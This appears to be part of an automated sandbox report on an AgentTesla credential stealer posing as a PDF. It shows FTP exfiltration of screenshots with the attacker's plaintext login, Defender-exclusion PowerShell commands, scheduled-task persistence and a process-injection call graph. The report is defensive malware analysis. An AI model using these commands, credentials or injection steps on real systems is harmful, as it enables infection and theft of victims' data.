                              Sep 25, 2024 14:45:30.983546019 CEST2165040110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.811 seconds (measured here), 91.04 Kbytes per second
                              Sep 25, 2024 14:45:59.895040035 CEST2165045110.4.45.197192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 50 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 50 allowed.220-Local time is now 20:46. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 50 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 50 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 50 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:45:59.895211935 CEST6504521192.168.2.9110.4.45.197USER origin@haliza.com.my
                              Sep 25, 2024 14:46:00.261992931 CEST2165045110.4.45.197192.168.2.9331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:46:00.263067961 CEST6504521192.168.2.9110.4.45.197PASS JesusChrist007$
                              Sep 25, 2024 14:46:00.671087027 CEST2165045110.4.45.197192.168.2.9230 OK. Current restricted directory is /
                              Sep 25, 2024 14:46:01.057591915 CEST2165045110.4.45.197192.168.2.9504 Unknown command
                              Sep 25, 2024 14:46:01.058243990 CEST6504521192.168.2.9110.4.45.197PWD
                              Sep 25, 2024 14:46:01.437719107 CEST2165045110.4.45.197192.168.2.9257 "/" is your current location
                              Sep 25, 2024 14:46:01.437848091 CEST6504521192.168.2.9110.4.45.197TYPE I
                              Sep 25, 2024 14:46:01.818774939 CEST2165045110.4.45.197192.168.2.9200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:46:01.818973064 CEST6504521192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:46:02.210742950 CEST2165045110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,230,98)
                              Sep 25, 2024 14:46:02.216464043 CEST6504521192.168.2.9110.4.45.197STOR SC_user-878411_2024_12_22_10_43_37.jpeg
                              Sep 25, 2024 14:46:03.095990896 CEST2165045110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:46:04.061877012 CEST2165045110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.973 seconds (measured here), 75.81 Kbytes per second
                              Sep 25, 2024 14:46:05.003916979 CEST6504521192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:46:05.407233953 CEST2165045110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,221,244)
                              Sep 25, 2024 14:46:05.418234110 CEST6504521192.168.2.9110.4.45.197STOR SC_user-878411_2024_12_27_04_46_06.jpeg
                              Sep 25, 2024 14:46:06.289006948 CEST2165045110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:46:07.118069887 CEST2165045110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.823 seconds (measured here), 89.68 Kbytes per second
                              Sep 25, 2024 14:46:09.978199005 CEST6504521192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:46:10.707081079 CEST2165045110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,206,115)
                              Sep 25, 2024 14:46:10.735522032 CEST6504521192.168.2.9110.4.45.197STOR SC_user-878411_2025_01_02_12_40_20.jpeg
                              Sep 25, 2024 14:46:11.621846914 CEST2165045110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:46:12.597202063 CEST2165045110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.815 seconds (measured here), 90.55 Kbytes per second
                              Sep 25, 2024 14:46:13.977505922 CEST6504521192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:46:14.397054911 CEST2165045110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,234,158)
                              Sep 25, 2024 14:46:14.402879953 CEST6504521192.168.2.9110.4.45.197STOR SC_user-878411_2025_01_07_17_07_28.jpeg
                              Sep 25, 2024 14:46:15.331830978 CEST2165045110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:46:16.296406031 CEST2165045110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.963 seconds (measured here), 76.61 Kbytes per second
                              Sep 25, 2024 14:46:33.817956924 CEST6504021192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:46:34.410547972 CEST6504521192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:46:34.447510958 CEST2165040110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,225,87)
                              Sep 25, 2024 14:46:34.447932959 CEST2165040110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,225,87)
                              Sep 25, 2024 14:46:34.453856945 CEST6504021192.168.2.9110.4.45.197STOR SC_user-878411_2024_09_25_08_46_32.jpeg
                              Sep 25, 2024 14:46:34.841181993 CEST2165045110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,198,164)
                              Sep 25, 2024 14:46:34.849772930 CEST6504521192.168.2.9110.4.45.197STOR SC_user-878411_2024_09_25_08_46_33.jpeg
                              Sep 25, 2024 14:46:35.398848057 CEST2165040110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:46:35.744278908 CEST2165045110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:46:35.834079981 CEST2165051110.4.45.197192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.220-Local time is now 20:46. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:46:35.834309101 CEST6505121192.168.2.9110.4.45.197USER origin@haliza.com.my
                              Sep 25, 2024 14:46:36.221298933 CEST2165051110.4.45.197192.168.2.9331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:46:36.221535921 CEST6505121192.168.2.9110.4.45.197PASS JesusChrist007$
                              Sep 25, 2024 14:46:36.313978910 CEST2165040110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.925 seconds (measured here), 79.78 Kbytes per second
                              Sep 25, 2024 14:46:36.657290936 CEST2165051110.4.45.197192.168.2.9230 OK. Current restricted directory is /
                              Sep 25, 2024 14:46:36.697979927 CEST2165045110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.954 seconds (measured here), 77.60 Kbytes per second
                              Sep 25, 2024 14:46:37.054893970 CEST2165051110.4.45.197192.168.2.9504 Unknown command
                              Sep 25, 2024 14:46:37.055047989 CEST6505121192.168.2.9110.4.45.197PWD
                              Sep 25, 2024 14:46:37.457376003 CEST2165051110.4.45.197192.168.2.9257 "/" is your current location
                              Sep 25, 2024 14:46:37.457590103 CEST6505121192.168.2.9110.4.45.197TYPE I
                              Sep 25, 2024 14:46:37.933031082 CEST2165051110.4.45.197192.168.2.9200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:46:37.933207035 CEST6505121192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:46:38.291529894 CEST2165051110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,200,170)
                              Sep 25, 2024 14:46:38.297013998 CEST6505121192.168.2.9110.4.45.197STOR SC_user-878411_2024_09_25_08_46_32.jpeg
                              Sep 25, 2024 14:46:39.207407951 CEST2165051110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:46:40.157882929 CEST2165051110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.940 seconds (measured here), 78.47 Kbytes per second

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:08:42:18
                              Start date:25/09/2024
                              Path:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                              Imagebase:0x5d0000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:3
                              Start time:08:42:19
                              Start date:25/09/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                              Imagebase:0x900000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:08:42:19
                              Start date:25/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:5
                              Start time:08:42:19
                              Start date:25/09/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"
                              Imagebase:0x900000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:6
                              Start time:08:42:20
                              Start date:25/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:7
                              Start time:08:42:20
                              Start date:25/09/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp"
                              Imagebase:0xc00000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:8
                              Start time:08:42:20
                              Start date:25/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:9
                              Start time:08:42:20
                              Start date:25/09/2024
                              Path:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                              Imagebase:0x1a0000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:10
                              Start time:08:42:20
                              Start date:25/09/2024
                              Path:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                              Imagebase:0x450000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3860883657.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3860883657.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3860883657.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:11
                              Start time:08:42:21
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                              Imagebase:0xb40000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 66%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:12
                              Start time:08:42:23
                              Start date:25/09/2024
                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase:0x7ff72d8c0000
                              File size:496'640 bytes
                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:13
                              Start time:08:42:26
                              Start date:25/09/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp"
                              Imagebase:0xc00000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:14
                              Start time:08:42:26
                              Start date:25/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:15
                              Start time:08:42:26
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"
                              Imagebase:0xff0000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3860059633.00000000033EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3860059633.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3860059633.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:16
                              Start time:08:42:31
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                              Imagebase:0xdf0000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 66%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:17
                              Start time:08:42:33
                              Start date:25/09/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp675.tmp"
                              Imagebase:0xc00000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:18
                              Start time:08:42:33
                              Start date:25/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:19
                              Start time:08:42:33
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                              Imagebase:0xd40000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.1620262791.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.1620262791.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.1620262791.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              General

                              Target ID:21
                              Start time:08:42:40
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                              Imagebase:0x310000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:22
                              Start time:08:42:41
                              Start date:25/09/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp26DE.tmp"
                              Imagebase:0xc00000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:23
                              Start time:08:42:41
                              Start date:25/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:24
                              Start time:08:42:41
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                              Imagebase:0xc30000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.3861351736.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3861351736.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3861351736.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:false

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:10.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:108
                                Total number of Limit Nodes:4
                                execution_graph 26905 102d700 DuplicateHandle 26906 102d796 26905->26906 26914 102b010 26915 102b01f 26914->26915 26917 102b0f8 26914->26917 26918 102b13c 26917->26918 26919 102b119 26917->26919 26918->26915 26919->26918 26920 102b340 GetModuleHandleW 26919->26920 26921 102b36d 26920->26921 26921->26915 26922 7111229 26923 71110b4 26922->26923 26924 7111339 26923->26924 26927 7113b00 26923->26927 26940 7113afb 26923->26940 26928 7113b1a 26927->26928 26930 7113b3e 26928->26930 26953 7113ff1 26928->26953 26958 7113f7f 26928->26958 26962 711414c 26928->26962 26967 71140d6 26928->26967 26971 7114545 26928->26971 26976 7114062 26928->26976 26980 71142c2 26928->26980 26984 71145e2 26928->26984 26988 7114020 26928->26988 26994 7114330 26928->26994 26930->26924 26941 7113b03 26940->26941 26942 7113b3e 26941->26942 26943 7113ff1 2 API calls 26941->26943 26944 7114330 2 API calls 26941->26944 26945 7114020 3 API calls 26941->26945 26946 71145e2 2 API calls 26941->26946 26947 71142c2 ResumeThread 26941->26947 26948 7114062 ResumeThread 26941->26948 26949 7114545 2 API calls 26941->26949 26950 71140d6 2 API calls 26941->26950 26951 711414c 2 API calls 26941->26951 26952 7113f7f 2 API calls 26941->26952 26942->26924 26943->26942 26944->26942 26945->26942 26946->26942 26947->26942 26948->26942 26949->26942 26950->26942 26951->26942 26952->26942 26954 7114615 26953->26954 26998 7110700 26954->26998 27002 71106f9 26954->27002 26955 7113fd7 26955->26930 27006 7110c98 26958->27006 27010 7110c8c 26958->27010 26963 7114161 26962->26963 27014 7110610 26963->27014 27018 7110608 26963->27018 26964 7114974 26969 7110610 WriteProcessMemory 26967->26969 26970 7110608 WriteProcessMemory 26967->26970 26968 71140b0 26968->26930 26969->26968 26970->26968 26972 711486a 26971->26972 27022 7110471 26972->27022 27026 7110478 26972->27026 26973 7114885 26977 711406f 26976->26977 27030 50bfbc0 26977->27030 26981 71142dc 26980->26981 26983 50bfbc0 ResumeThread 26981->26983 26982 7113fd7 26982->26930 26983->26982 27034 7110550 26984->27034 27038 7110548 26984->27038 26985 7114600 26985->26930 26991 7110471 Wow64SetThreadContext 26988->26991 26992 7110478 Wow64SetThreadContext 26988->26992 26989 7114043 26989->26930 26993 50bfbc0 ResumeThread 26989->26993 26990 7113fd7 26990->26930 26991->26989 26992->26989 26993->26990 26996 7110610 WriteProcessMemory 26994->26996 26997 7110608 WriteProcessMemory 26994->26997 26995 711435e 26996->26995 26997->26995 26999 711074b ReadProcessMemory 26998->26999 27001 711078f 26999->27001 27001->26955 27003 711074b ReadProcessMemory 27002->27003 27005 711078f 27003->27005 27005->26955 27007 7110d21 CreateProcessA 27006->27007 27009 7110ee3 27007->27009 27011 7110c9b CreateProcessA 27010->27011 27013 7110ee3 27011->27013 27015 7110658 WriteProcessMemory 27014->27015 27017 71106af 27015->27017 27017->26964 27019 7110613 WriteProcessMemory 27018->27019 27021 71106af 27019->27021 27021->26964 27023 71104bd Wow64SetThreadContext 27022->27023 27025 7110505 27023->27025 27025->26973 27027 71104bd Wow64SetThreadContext 27026->27027 27029 7110505 27027->27029 27029->26973 27031 50bfc00 ResumeThread 27030->27031 27033 50bfc31 27031->27033 27033->26930 27035 7110590 VirtualAllocEx 27034->27035 27037 71105cd 27035->27037 27037->26985 27039 7110590 VirtualAllocEx 27038->27039 27041 71105cd 27039->27041 27041->26985 26907 7114e98 26908 7115023 26907->26908 26910 7114ebe 26907->26910 26910->26908 26911 71109d4 26910->26911 26912 7115118 PostMessageW 26911->26912 26913 7115184 26912->26913 26913->26910 27042 102d4b8 27043 102d4fe GetCurrentProcess 27042->27043 27045 102d550 GetCurrentThread 27043->27045 27046 102d549 27043->27046 27047 102d586 27045->27047 27048 102d58d GetCurrentProcess 27045->27048 27046->27045 27047->27048 27051 102d5c3 27048->27051 27049 102d5eb GetCurrentThreadId 27050 102d61c 27049->27050 27051->27049

                                Executed Functions

                                Function 050BA070 Relevance: .1, Instructions: 130COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448591434.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_50b0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: db95da23d3b7e3afeaf6b6566d78a9f55c6fbddf96ed73b322774ced9569acf6
                                • Instruction ID: f4997b328af0c5eb47a89241aa98061a8b3b82e563062164acef5913bcb0cb4e
                                • Opcode Fuzzy Hash: db95da23d3b7e3afeaf6b6566d78a9f55c6fbddf96ed73b322774ced9569acf6
                                • Instruction Fuzzy Hash: F2416C74E092098FEB48CFA9E8806EEFBF7AF89301F18D469D419A7251D7744901CB54
                                Function 071145C0 Relevance: .0, Instructions: 18COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fa2f4f442b869272919a87b786acf105f9c12d80c3a60c5f24cea0bd7fb46f07
                                • Instruction ID: f5217d3eb6a11cdd138194b912b08160ef0e973438642ca77b14cba0ce774283
                                • Opcode Fuzzy Hash: fa2f4f442b869272919a87b786acf105f9c12d80c3a60c5f24cea0bd7fb46f07
                                • Instruction Fuzzy Hash: F7C08051D9D0C4C9C50409C474000F8F77CC94F911F0B34B28D4F5718253004126410C
                                Function 0102D4A9 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0102D536
                                • GetCurrentThread.KERNEL32 ref: 0102D573
                                • GetCurrentProcess.KERNEL32 ref: 0102D5B0
                                • GetCurrentThreadId.KERNEL32 ref: 0102D609
                                Memory Dump Source
